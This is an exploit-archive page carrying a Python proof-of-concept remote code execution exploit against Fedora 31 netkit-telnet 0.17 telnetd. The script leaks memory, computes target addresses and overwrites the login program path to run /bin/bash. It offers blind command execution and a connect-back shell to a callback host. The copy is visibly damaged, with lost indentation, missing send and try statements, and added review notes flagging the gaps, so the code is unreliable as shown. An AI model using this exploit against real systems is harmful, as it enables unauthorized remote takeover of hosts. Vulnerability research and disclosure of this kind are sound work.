Exploits / Vulnerability Discovered : 2020-03-02 |
Type : remote |
Platform : linux
This exploit / vulnerability (netkit-telnet 0.17 telnetd on Fedora 31, "BraveStarr" remote code execution) is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
#!/usr/bin/env python3
# BraveStarr
# ==========
# Proof of Concept remote exploit against Fedora 31 netkit-telnet-0.17 telnetd.
# This is for demonstration purposes only. It has by no means been engineered
# to be reliable: 0xff bytes in addresses and inputs are not handled, and a lot
# of other constraints are not validated.
# AppGate (C) 2020 / Ronald Huizer / @ronaldhuizer
import argparse
import base64
import fcntl
import gzip
import socket
import struct
import sys
import termios
import time
# Driver class for the BraveStarr proof of concept.
# The class-level constants below are Telnet protocol command bytes; the
# values match the command codes assigned in RFC 854.
# NOTE(review): indentation was lost in this copy of the file, so the class
# body and its methods all appear at column 0.
class BraveStarr(object):
SE = 240 # 0xf0 - end of subnegotiation parameters
DM = 242 # 0xf2 - data mark
AO = 245 # 0xf5 - abort output
SB = 250 # 0xfa - subnegotiation begin
WILL = 251 # 0xfb - WILL option negotiation
WONT = 252 # 0xfc - WON'T option negotiation
DO = 253 # 0xfd - DO option negotiation
IAC = 255 # 0xff - interpret as command (escape byte)
# Try to ensure the remote side will read a full 8191 bytes for
# `netobuf_fill' to work properly.
self.sd.setsockopt(socket.IPPROTO_TCP, socket.TCP_MAXSEG, 8191)
def netobuf_fill(self, delta):
# Build the request intended to fill the remote `netobuf' up to, but not
# including, its last byte.
#
# delta: how many times the self.do(self.SB) sequence is repeated at the
# start of the request.
#
# NOTE(review): self.do(), self.ao() and self.NETOBUF_SIZE are defined
# outside the visible part of this file; the byte sequences they produce
# are assumed from their names and the comments below -- confirm.
#
# This populates the prefix of `netobuf' with IAC WONT SB triplets.
# This is not relevant now, but the next time data is sent `netobuf'
# will be reprocessed in `netclear', which calls `nextitem'.
# The `nextitem' function will overindex past `nfrontp' and use these
# triplets in the processing logic.
s = self.do(self.SB) * delta
# IAC AO will cause netkit-telnetd to add IAC DM to `netobuf' and set
# `neturg' to the DM byte in `netobuf'.
s += self.ao()
# In this request, every byte in `netibuf' will store a byte in
# `netobuf'. Here we ensure that all `netobuf' space is filled except
# for the last byte.
# The repeat count is always in 1..3; it pads so that the space left for
# the IAC DO IAC triplets below works out as described.
s += self.ao() * (3 - (self.NETOBUF_SIZE - len(s) - 1) % 3)
# We fill `netobuf' with the IAC DO IAC pattern. The last IAC DO IAC
# triplet will write IAC to the last free byte of `netobuf'. After
# this `netflush' will be called, and the DO IAC bytes will be written
# to the beginning of the now empty `netobuf'.
s += self.do(self.IAC) * ((self.NETOBUF_SIZE - len(s)) // 3)
# Send it out. This should be read in a single read(..., 8191) call on
# the remote side. We should probably tune the TCP MSS for this.
# We need to ensure this is written to the remote now. This is a bit
# of a kludge, as the remote can perfectly well still merge the
# separate packets into a single read(). This is less likely as the
# time delay increases. To do this properly we'd need to statefully
# match the responses to what we send. Alack, this is a PoC.
# NOTE(review): no send or delay statement is visible after these
# comments; the code they describe appears to be missing from this view.
def reset_and_sync(self):
# Read from the socket until the accumulated data either contains the
# SB + TELOPT_STATUS prefix or ends with the SE sequence.
#
# After triggering the bug, we want to ensure that nbackp = nfrontp =
# netobuf. We can do so by getting netflush() called, and an easy way to
# accomplish this is using the TELOPT_STATUS suboption, which will end
# with a netflush.
# We resynchronize on the output we receive by loosely scanning if the
# TELOPT_STATUS option is there. This is not a reliable way to do
# things. Alack, this is a PoC.
# NOTE(review): the statement that actually issues the TELOPT_STATUS
# request is not visible in this block -- confirm against the full file.
s = b""
# Marker to look for: whatever self.sb() returns followed by the
# TELOPT_STATUS option byte (%c formats an int as a single byte).
status = b"%s%c" % (self.sb(), self.TELOPT_STATUS)
# NOTE(review): if recv() returns b"" (peer closed the connection) `s'
# never changes and this loop has no exit condition.
while status not in s and not s.endswith(self.se()):
s += self.sd.recv(self.NETOBUF_SIZE)
def telopt_status(self, mode=None):
# Build a TELOPT_STATUS suboption request.
#
# mode: suboption qualifier byte; defaults to self.TELQUAL_SEND when None.
#
# The request is self.sb(), the TELOPT_STATUS option byte, the mode byte,
# then self.se().
# NOTE(review): in the visible code `s' is built but neither returned nor
# sent; the remainder of this method appears to be missing from this view.
if mode is None: mode = self.TELQUAL_SEND
s = b"%s%c%c%s" % (self.sb(), self.TELOPT_STATUS, mode, self.se())
def trigger(self, delta, prefix=b"", suffix=b""):
# Assemble the request: prefix, self.se(), `delta' repetitions of
# self.do(self.IAC), self.ao(), then suffix.
#
# delta:  repeat count for the self.do(self.IAC) sequence.
# prefix: raw bytes placed at the very start of the request.
# suffix: raw bytes placed at the very end of the request.
#
# Both prefix and suffix must be free of 0xff bytes. This is enforced
# with assert, so the checks disappear under `python -O'.
# NOTE(review): in the visible code `s' is assembled but never sent or
# returned; the tail of this method appears to be missing from this view.
assert b"\xff" not in prefix
assert b"\xff" not in suffix
s = prefix
# Add a literal b"\xff\xf0" to `netibuf'. This will terminate the
# `nextitem' scanning for IAC SB sequences.
s += self.se()
s += self.do(self.IAC) * delta
# IAC AO will force a call to `netclear'.
s += self.ao()
s += suffix
def infoleak(self):
# Call trigger() with self.leak_marker as the prefix, then accumulate
# received data until the marker shows up in it.
#
# Returns the accumulated bytes, which include the marker.
# On a socket timeout, or when recv() returns b"", self.fatal() is called.
# NOTE(review): self.fatal() is defined outside this view; the code below
# presumably relies on it not returning -- confirm.
#
# We use a delta that creates a SB/SE item
delta = 512
self.trigger(delta, self.leak_marker)
s = b""
while self.leak_marker not in s:
# NOTE(review): the `try:' that the `except' below belongs to is not
# visible in this copy of the file.
ret = self.sd.recv(8192)
except socket.timeout:
self.fatal('infoleak unsuccessful.')
# An empty read means the peer closed the connection.
if ret == b"":
self.fatal('infoleak unsuccessful.')
s += ret
return s
def infoleak_analyze(self, s):
# Parse the bytes returned by infoleak() and record the decoded values in
# self.values and the derived addresses in self.addresses.
#
# s: bytes containing self.leak_marker; rindex() raises ValueError when
#    the marker is absent.
#
# Fields are read back to front from the data preceding the last marker
# occurrence (after dropping 20 bytes of padding), all little-endian:
#   last 4 bytes -> 'net'     (unsigned 32-bit)
#   previous 8   -> 'neturg'  (unsigned 64-bit)
#   previous 8   -> 'pfrontp' (unsigned 64-bit)
#   previous 8   -> 'netip'   (unsigned 64-bit)
m = s.rindex(self.leak_marker)
s = s[:m-20] # Cut 20 bytes of padding off too.
# Layout will depend on build. This works on Fedora 31.
self.values['net'] = struct.unpack("<I", s[-4:])[0]
self.values['neturg'] = struct.unpack("<Q", s[-12:-4])[0]
self.values['pfrontp'] = struct.unpack("<Q", s[-20:-12])[0]
self.values['netip'] = struct.unpack("<Q", s[-28:-20])[0]
# Resolve Fedora 31 specific addresses.
# `& ~4095' clears the low 12 bits of 'netip'; 0x980 is then added to
# form the 'netibuf' address.
self.addresses['netibuf'] = (self.values['netip'] & ~4095) + 0x980
# Length of the longest key in self.netibuf_deltas.
# NOTE(review): `adjustment' is not used by any statement visible in this
# block.
adjustment = len(max(self.netibuf_deltas, key=len))
# Every other address is 'netibuf' plus the per-symbol delta.
for k, v in self.netibuf_deltas.items():
self.addresses[k] = self.addresses['netibuf'] + v
def _scratch_build(self, cmd, argv, envp):
# Serialise argv/envp pointer tables and their strings into one byte
# string (`rcsid'), laid out as if it were placed at
# self.addresses['state_rcsid'].
#
# cmd:  NOTE(review): not referenced by any statement visible in this block.
# argv: sequence of bytes objects (argument strings, without trailing NUL).
# envp: sequence of bytes objects (environment strings, without trailing
#       NUL).
#
# Layout of `rcsid', in order:
#   len(argv) 64-bit little-endian pointers, then a NULL pointer
#   len(envp) 64-bit little-endian pointers, then a NULL pointer
#   the argv strings, each NUL-terminated
#   the envp strings, each NUL-terminated
#   the exec stub string, NUL-terminated
#
# NOTE(review): no return statement is visible; argv_address,
# envp_address, stub_address and rcsid are computed but their consumer is
# not shown in this view.
#
# We use `state_rcsid' as the scratch memory area. As this area is
# fairly small, the bytes after it on the data segment will likely
# also be used. Nothing harmful is contained here for a while, so
# this is okay.
scratchpad = self.addresses['state_rcsid']
exec_stub = b"/bin/bash"
rcsid = b""
# Offset of the first string: it follows both pointer tables, including
# their two NULL terminators (8 bytes per entry).
data_offset = (len(argv) + len(envp) + 2) * 8
# First we populate all argv pointers into the scratchpad.
argv_address = scratchpad
for arg in argv:
rcsid += struct.pack("<Q", scratchpad + data_offset)
data_offset += len(arg) + 1
rcsid += struct.pack("<Q", 0)
# Next we populate all envp pointers into the scratchpad.
envp_address = scratchpad + len(rcsid)
for env in envp:
rcsid += struct.pack("<Q", scratchpad + data_offset)
data_offset += len(env) + 1
rcsid += struct.pack("<Q", 0)
# Now handle the argv strings.
for arg in argv:
rcsid += arg + b'\0'
# And the environment strings.
for env in envp:
rcsid += env + b'\0'
# Finally the execution stub command is stored here.
stub_address = scratchpad + len(rcsid)
rcsid += exec_stub + b"\0"
# The initial exploitation vector: this overwrites the area after
# `netobuf' with updated pointer values to overwrite `loginprg'.
v = struct.pack("<Q", self.addresses['netibuf']) # netip
v += struct.pack("<Q", self.addresses['loginprg']) # pfrontp
v += struct.pack("<Q", 0) # neturg
v += struct.pack("<I", self.values['net']) # net
v = v.ljust(48, b'\0') # padding
self.trigger(len(v), v + struct.pack('<Q', stub), b"A" * 8)
s = b""
s += self._fill_area('state_rcsid', 'loginprg', 8)
s += rcsid
s += self._fill_area('ptyslavefd', 'state_rcsid', len(rcsid))
s += struct.pack("<I", 5)
s += self._fill_area('environ', 'ptyslavefd', 4)
s += struct.pack("<Q", envp)
s += self._fill_area('LastArgv', 'environ', 8)
s += struct.pack("<Q", argv) * 2
s += self._fill_area('remote_host_name', 'LastArgv', 16)
s += b"-c\0"
# We need to finish `getterminaltype' in telnetd and ensure `startslave' is
# called.
# Command-line front end: registers the 'leak', 'command' and 'shell'
# sub-commands, parses the arguments, prints the banner, constructs the
# BraveStarr object and prints the resolved addresses.
# NOTE(review): `parser', `method_parser' and `banner' are defined outside
# the visible part of this file, and several steps between the statements
# below appear to be missing from this view.
method_infoleak_parser = method_parser.add_parser('leak', help='Leaks memory of the remote process')
method_cmd_parser = method_parser.add_parser('command', help='Executes a blind command on the remote')
method_cmd_parser.add_argument('command', help='Command to execute')
method_shell_parser = method_parser.add_parser('shell', help='Spawns a shell on the remote and connects back')
method_shell_parser.add_argument('-c', '--callback', dest='callback', required=True, help='Host to connect back a shell to')
args = parser.parse_args()
# The banner is stored base64-encoded and gzip-compressed; it is written
# line by line as raw bytes to stdout.
for line in gzip.decompress(base64.b64decode(banner)).split(b"\n"):
sys.stdout.buffer.write(line + b"\n")
# `callback' only exists on the namespace for the 'shell' sub-command,
# hence getattr() with a None default.
t = BraveStarr(args.hostname, port=args.port, timeout=args.timeout,
callback_host=getattr(args, 'callback', None))
print(f"\u26e4 Connecting to {args.hostname}:{args.port}")
# For the `shell' method, we set up a listening socket to receive the callback
# shell on.
# The socket is bound to all interfaces ('') on the hard-coded port 12345.
# NOTE(review): no listen()/accept() call is visible in this view.
if args.method == 'shell':
sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sd.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sd.bind(('', 12345))
print("\n\u26e4 Resolved addresses")
# Column width for the listing: length of the longest symbol name.
adjustment = len(max(t.netibuf_deltas, key=len))
for k, v in t.netibuf_deltas.items():
print(f" {k:<{adjustment}}: {t.addresses[k]:#016x}")